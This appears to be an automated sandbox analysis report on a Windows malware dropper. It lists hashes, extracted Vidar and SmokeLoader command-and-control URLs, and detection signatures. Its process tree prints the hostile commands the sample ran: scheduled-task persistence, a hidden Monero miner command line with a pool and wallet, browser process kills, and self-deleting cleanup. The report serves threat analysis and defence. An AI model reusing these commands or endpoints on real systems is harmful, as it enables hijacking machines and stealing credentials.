Analysis
-
max time kernel
17s -
max time network
153s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
14/08/2021, 00:10
Static task
static1
Behavioral task
behavioral1
Sample
a128c5bc0609f0871555f4e66bb19717.exe
Resource
win7v20210408
General
-
Target
a128c5bc0609f0871555f4e66bb19717.exe
-
Size
3.3MB
-
MD5
a128c5bc0609f0871555f4e66bb19717
-
SHA1
3b7c2d36a7bd94d6d57c73a1dbfd783948422979
-
SHA256
a282005eef80a8f19035835337c495306785cd4b6452cff47ea42c89e32f2001
-
SHA512
328faa0446b56613df66824e4e43a6f6e7e9d093d088433d84f9bf993610c3d40962d5c57cdeec79beda32971c0ff3274d61dba1fcbb424b813edc43e327d031
Malware Config
Extracted
vidar
40
706
https://lenak513.tumblr.com/
-
profile_id
706
Extracted
smokeloader
2020
http://aucmoney.com/upload/
http://thegymmum.com/upload/
http://atvcampingtrips.com/upload/
http://kuapakualaman.com/upload/
http://renatazarazua.com/upload/
http://nasufmutlu.com/upload/
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2204 904 rundll32.exe 54 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2504 904 rundll32.exe 54 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
resource yara_rule behavioral1/memory/2496-237-0x0000000000800000-0x0000000000832000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE GCleaner Downloader Activity M1
suricata: ET MALWARE GCleaner Downloader Activity M1
-
suricata: ET MALWARE GCleaner Downloader Activity M2
suricata: ET MALWARE GCleaner Downloader Activity M2
-
suricata: ET MALWARE GCleaner Downloader Activity M3
suricata: ET MALWARE GCleaner Downloader Activity M3
-
suricata: ET MALWARE GCleaner Related Downloader User-Agent
suricata: ET MALWARE GCleaner Related Downloader User-Agent
-
suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral1/memory/520-197-0x0000000000E80000-0x0000000000F1D000-memory.dmp family_vidar behavioral1/memory/520-202-0x0000000000400000-0x000000000095B000-memory.dmp family_vidar -
resource yara_rule behavioral1/files/0x00030000000130c7-76.dat aspack_v212_v242 behavioral1/files/0x00030000000130c7-77.dat aspack_v212_v242 behavioral1/files/0x00030000000130c6-78.dat aspack_v212_v242 behavioral1/files/0x00030000000130c6-79.dat aspack_v212_v242 behavioral1/files/0x00030000000130c9-82.dat aspack_v212_v242 behavioral1/files/0x00030000000130c9-83.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 11 IoCs
pid Process 1260 setup_installer.exe 856 setup_install.exe 1008 cb4071ec97a2.exe 1356 cb4071ec97a2.exe 736 c65040c72c7.exe 520 ed10a8b2b3d6.exe 1692 757755d929c68.exe 1228 cmd.exe 1664 a6d6262485.exe 1544 6f0ef9103.exe 656 a6d6262485.tmp -
resource yara_rule behavioral1/files/0x00030000000130cd-166.dat vmprotect behavioral1/files/0x00030000000130cd-161.dat vmprotect behavioral1/files/0x00030000000130cd-174.dat vmprotect behavioral1/files/0x00030000000130cd-173.dat vmprotect behavioral1/files/0x00030000000130cd-160.dat vmprotect behavioral1/files/0x00030000000130cd-159.dat vmprotect behavioral1/memory/1544-175-0x0000000000400000-0x0000000000759000-memory.dmp vmprotect -
Loads dropped DLL 40 IoCs
pid Process 736 a128c5bc0609f0871555f4e66bb19717.exe 1260 setup_installer.exe 1260 setup_installer.exe 1260 setup_installer.exe 1260 setup_installer.exe 1260 setup_installer.exe 1260 setup_installer.exe 856 setup_install.exe 856 setup_install.exe 856 setup_install.exe 856 setup_install.exe 856 setup_install.exe 856 setup_install.exe 856 setup_install.exe 856 setup_install.exe 480 cmd.exe 480 cmd.exe 1008 cb4071ec97a2.exe 1008 cb4071ec97a2.exe 1044 cmd.exe 1044 cmd.exe 1824 cmd.exe 1824 cmd.exe 524 Process not Found 1008 cb4071ec97a2.exe 1752 cmd.exe 520 ed10a8b2b3d6.exe 520 ed10a8b2b3d6.exe 736 c65040c72c7.exe 736 c65040c72c7.exe 816 cmd.exe 752 cmd.exe 752 cmd.exe 1664 a6d6262485.exe 1664 a6d6262485.exe 1356 cb4071ec97a2.exe 1356 cb4071ec97a2.exe 1544 6f0ef9103.exe 1544 6f0ef9103.exe 1664 a6d6262485.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 104 ip-api.com 12 ipinfo.io 16 ipinfo.io -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 7 IoCs
pid pid_target Process procid_target 3052 1816 WerFault.exe 52 2444 3012 WerFault.exe 67 2124 520 WerFault.exe 41 3840 2088 WerFault.exe 55 2504 2772 WerFault.exe 75 3492 2752 WerFault.exe 81 2264 1832 WerFault.exe 87 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c65040c72c7.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c65040c72c7.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI c65040c72c7.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3484 schtasks.exe 3916 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 3716 timeout.exe 3400 timeout.exe -
Kills process with taskkill 2 IoCs
pid Process 3020 taskkill.exe 3288 taskkill.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2880 PING.EXE -
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 15 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 26 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 8 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 736 c65040c72c7.exe 736 c65040c72c7.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1692 757755d929c68.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 736 wrote to memory of 1260 736 a128c5bc0609f0871555f4e66bb19717.exe 29 PID 736 wrote to memory of 1260 736 a128c5bc0609f0871555f4e66bb19717.exe 29 PID 736 wrote to memory of 1260 736 a128c5bc0609f0871555f4e66bb19717.exe 29 PID 736 wrote to memory of 1260 736 a128c5bc0609f0871555f4e66bb19717.exe 29 PID 736 wrote to memory of 1260 736 a128c5bc0609f0871555f4e66bb19717.exe 29 PID 736 wrote to memory of 1260 736 a128c5bc0609f0871555f4e66bb19717.exe 29 PID 736 wrote to memory of 1260 736 a128c5bc0609f0871555f4e66bb19717.exe 29 PID 1260 wrote to memory of 856 1260 setup_installer.exe 30 PID 1260 wrote to memory of 856 1260 setup_installer.exe 30 PID 1260 wrote to memory of 856 1260 setup_installer.exe 30 PID 1260 wrote to memory of 856 1260 setup_installer.exe 30 PID 1260 wrote to memory of 856 1260 setup_installer.exe 30 PID 1260 wrote to memory of 856 1260 setup_installer.exe 30 PID 1260 wrote to memory of 856 1260 setup_installer.exe 30 PID 856 wrote to memory of 428 856 setup_install.exe 32 PID 856 wrote to memory of 428 856 setup_install.exe 32 PID 856 wrote to memory of 428 856 setup_install.exe 32 PID 856 wrote to memory of 428 856 setup_install.exe 32 PID 856 wrote to memory of 428 856 setup_install.exe 32 PID 856 wrote to memory of 428 856 setup_install.exe 32 PID 856 wrote to memory of 428 856 setup_install.exe 32 PID 856 wrote to memory of 480 856 setup_install.exe 33 PID 856 wrote to memory of 480 856 setup_install.exe 33 PID 856 wrote to memory of 480 856 setup_install.exe 33 PID 856 wrote to memory of 480 856 setup_install.exe 33 PID 856 wrote to memory of 480 856 setup_install.exe 33 PID 856 wrote to memory of 480 856 setup_install.exe 33 PID 856 wrote to memory of 480 856 setup_install.exe 33 PID 856 wrote to memory of 620 856 setup_install.exe 34 PID 856 wrote to memory of 620 856 setup_install.exe 34 PID 856 wrote to memory of 620 856 setup_install.exe 34 PID 856 wrote to memory of 620 856 setup_install.exe 34 PID 856 wrote to memory of 620 856 setup_install.exe 34 PID 856 wrote to memory of 620 856 setup_install.exe 34 PID 856 wrote to memory of 620 856 setup_install.exe 34 PID 856 wrote to memory of 752 856 setup_install.exe 35 PID 856 wrote to memory of 752 856 setup_install.exe 35 PID 856 wrote to memory of 752 856 setup_install.exe 35 PID 856 wrote to memory of 752 856 setup_install.exe 35 PID 856 wrote to memory of 752 856 setup_install.exe 35 PID 856 wrote to memory of 752 856 setup_install.exe 35 PID 856 wrote to memory of 752 856 setup_install.exe 35 PID 856 wrote to memory of 816 856 setup_install.exe 49 PID 856 wrote to memory of 816 856 setup_install.exe 49 PID 856 wrote to memory of 816 856 setup_install.exe 49 PID 856 wrote to memory of 816 856 setup_install.exe 49 PID 856 wrote to memory of 816 856 setup_install.exe 49 PID 856 wrote to memory of 816 856 setup_install.exe 49 PID 856 wrote to memory of 816 856 setup_install.exe 49 PID 480 wrote to memory of 1008 480 cmd.exe 36 PID 480 wrote to memory of 1008 480 cmd.exe 36 PID 480 wrote to memory of 1008 480 cmd.exe 36 PID 480 wrote to memory of 1008 480 cmd.exe 36 PID 480 wrote to memory of 1008 480 cmd.exe 36 PID 480 wrote to memory of 1008 480 cmd.exe 36 PID 480 wrote to memory of 1008 480 cmd.exe 36 PID 856 wrote to memory of 1824 856 setup_install.exe 37 PID 856 wrote to memory of 1824 856 setup_install.exe 37 PID 856 wrote to memory of 1824 856 setup_install.exe 37 PID 856 wrote to memory of 1824 856 setup_install.exe 37 PID 856 wrote to memory of 1824 856 setup_install.exe 37 PID 856 wrote to memory of 1824 856 setup_install.exe 37 PID 856 wrote to memory of 1824 856 setup_install.exe 37 PID 856 wrote to memory of 1044 856 setup_install.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\a128c5bc0609f0871555f4e66bb19717.exe"C:\Users\Admin\AppData\Local\Temp\a128c5bc0609f0871555f4e66bb19717.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:736 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1260 -
C:\Users\Admin\AppData\Local\Temp\7zSCE452384\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSCE452384\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:856 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c APPNAME11.exe4⤵PID:428
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cb4071ec97a2.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:480 -
C:\Users\Admin\AppData\Local\Temp\7zSCE452384\cb4071ec97a2.execb4071ec97a2.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1008 -
C:\Users\Admin\AppData\Local\Temp\7zSCE452384\cb4071ec97a2.exe"C:\Users\Admin\AppData\Local\Temp\7zSCE452384\cb4071ec97a2.exe" -a6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1356
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 30dd64a3b09404.exe4⤵PID:620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 6f0ef9103.exe4⤵
- Loads dropped DLL
PID:752 -
C:\Users\Admin\AppData\Local\Temp\7zSCE452384\6f0ef9103.exe6f0ef9103.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1544
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c c65040c72c7.exe4⤵
- Loads dropped DLL
PID:1824 -
C:\Users\Admin\AppData\Local\Temp\7zSCE452384\c65040c72c7.exec65040c72c7.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ed10a8b2b3d6.exe4⤵
- Loads dropped DLL
PID:1044 -
C:\Users\Admin\AppData\Local\Temp\7zSCE452384\ed10a8b2b3d6.exeed10a8b2b3d6.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:520 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 520 -s 9766⤵
- Program crash
PID:2124
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 757755d929c68.exe4⤵
- Loads dropped DLL
PID:1752 -
C:\Users\Admin\AppData\Local\Temp\7zSCE452384\757755d929c68.exe757755d929c68.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1692 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:1816
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵PID:2732
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:3428
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:3484
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:3732
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:3832
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:3916
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:3900
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:2848
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1.exe"C:\Users\Admin\AppData\Local\Temp\1.exe"7⤵PID:2852
-
C:\Users\Admin\AppData\Roaming\2619790.exe"C:\Users\Admin\AppData\Roaming\2619790.exe"8⤵PID:2752
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2752 -s 17729⤵
- Program crash
PID:3492
-
-
-
C:\Users\Admin\AppData\Roaming\2581732.exe"C:\Users\Admin\AppData\Roaming\2581732.exe"8⤵PID:428
-
-
C:\Users\Admin\AppData\Roaming\4848551.exe"C:\Users\Admin\AppData\Roaming\4848551.exe"8⤵PID:1560
-
-
C:\Users\Admin\AppData\Roaming\4192099.exe"C:\Users\Admin\AppData\Roaming\4192099.exe"8⤵PID:1832
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1832 -s 19409⤵
- Program crash
PID:2264
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵PID:2940
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe8⤵PID:3208
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe9⤵
- Kills process with taskkill
PID:3288
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3.exe"C:\Users\Admin\AppData\Local\Temp\3.exe"7⤵PID:3012
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3012 -s 13928⤵
- Program crash
PID:2444
-
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"7⤵PID:2112
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{Y0W1-I8Dnm-6hsy-wcJWI}\52757232454.exe"8⤵PID:1128
-
C:\Users\Admin\AppData\Local\Temp\{Y0W1-I8Dnm-6hsy-wcJWI}\52757232454.exe"C:\Users\Admin\AppData\Local\Temp\{Y0W1-I8Dnm-6hsy-wcJWI}\52757232454.exe"9⤵PID:2880
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\{Y0W1-I8Dnm-6hsy-wcJWI}\52757232454.exe"10⤵PID:3044
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK11⤵
- Delays execution with timeout.exe
PID:3716
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{Y0W1-I8Dnm-6hsy-wcJWI}\91259044999.exe" /mix8⤵
- Executes dropped EXE
PID:1228 -
C:\Users\Admin\AppData\Local\Temp\{Y0W1-I8Dnm-6hsy-wcJWI}\91259044999.exe"C:\Users\Admin\AppData\Local\Temp\{Y0W1-I8Dnm-6hsy-wcJWI}\91259044999.exe" /mix9⤵PID:3048
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\u6vQLjiYG & timeout 2 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{Y0W1-I8Dnm-6hsy-wcJWI}\91259044999.exe"10⤵PID:3396
-
C:\Windows\SysWOW64\timeout.exetimeout 211⤵
- Delays execution with timeout.exe
PID:3400
-
-
-
C:\Users\Admin\AppData\Local\Temp\Filett.exe"C:\Users\Admin\AppData\Local\Temp\Filett.exe"10⤵PID:3384
-
C:\Users\Admin\AppData\Local\Temp\arose\vin.exe"C:\Users\Admin\AppData\Local\Temp\arose\vin.exe"11⤵PID:3288
-
C:\Windows\SysWOW64\dllhost.exedllhost.exe12⤵PID:3484
-
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Ricomincia.xls12⤵PID:3608
-
C:\Windows\SysWOW64\cmd.execmd13⤵PID:3032
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^jZvjHjHxviPgppBDTSaswkcVepFqvVJTGccDaWvLwkekqowEJeUGTSUqEBpnHGXBbWINNYkWcGfPopUUiqsxqrqOAcYRNYtcgBOtmgRKQYljCyScGgdGfCAzVUhaZxobCUBGxPcToGEwTOkc$" Cio.xls14⤵PID:2560
-
-
C:\Windows\SysWOW64\PING.EXEping QWOCTUPM -n 3014⤵
- Runs ping.exe
PID:2880
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Torno.exe.comTorno.exe.com p14⤵PID:4036
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Torno.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Torno.exe.com p15⤵PID:3136
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Torno.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Torno.exe.com p16⤵PID:524
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\arose\fine.exe"C:\Users\Admin\AppData\Local\Temp\arose\fine.exe"11⤵PID:3576
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"12⤵PID:3968
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{Y0W1-I8Dnm-6hsy-wcJWI}\10721299882.exe" /mix8⤵PID:2856
-
C:\Users\Admin\AppData\Local\Temp\{Y0W1-I8Dnm-6hsy-wcJWI}\10721299882.exe"C:\Users\Admin\AppData\Local\Temp\{Y0W1-I8Dnm-6hsy-wcJWI}\10721299882.exe" /mix9⤵PID:2508
-
C:\Users\Admin\AppData\Roaming\frekodi\apineshpp.exeapineshpp.exe10⤵PID:3516
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "4.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\4.exe" & exit8⤵PID:1672
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "4.exe" /f9⤵
- Kills process with taskkill
PID:3020
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵PID:2220
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe" -a8⤵PID:2380
-
-
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"7⤵PID:1984
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1816 -s 10807⤵
- Program crash
PID:3052
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 29dc9096b9.exe4⤵PID:524
-
C:\Users\Admin\AppData\Local\Temp\7zSCE452384\29dc9096b9.exe29dc9096b9.exe5⤵PID:1228
-
C:\Users\Admin\AppData\Roaming\7402998.exe"C:\Users\Admin\AppData\Roaming\7402998.exe"6⤵PID:2088
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2088 -s 15327⤵
- Program crash
PID:3840
-
-
-
C:\Users\Admin\AppData\Roaming\1556454.exe"C:\Users\Admin\AppData\Roaming\1556454.exe"6⤵PID:2284
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵PID:2228
-
-
-
C:\Users\Admin\AppData\Roaming\7889313.exe"C:\Users\Admin\AppData\Roaming\7889313.exe"6⤵PID:2496
-
-
C:\Users\Admin\AppData\Roaming\1763838.exe"C:\Users\Admin\AppData\Roaming\1763838.exe"6⤵PID:2792
-
-
C:\Users\Admin\AppData\Roaming\5075462.exe"C:\Users\Admin\AppData\Roaming\5075462.exe"6⤵PID:2772
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 18607⤵
- Program crash
PID:2504
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c a6d6262485.exe4⤵
- Loads dropped DLL
PID:816
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSCE452384\a6d6262485.exea6d6262485.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1664 -
C:\Users\Admin\AppData\Local\Temp\is-OGB21.tmp\a6d6262485.tmp"C:\Users\Admin\AppData\Local\Temp\is-OGB21.tmp\a6d6262485.tmp" /SL5="$10160,138429,56832,C:\Users\Admin\AppData\Local\Temp\7zSCE452384\a6d6262485.exe"2⤵
- Executes dropped EXE
PID:656
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2204 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:2224
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:2624
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2504 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:1560
-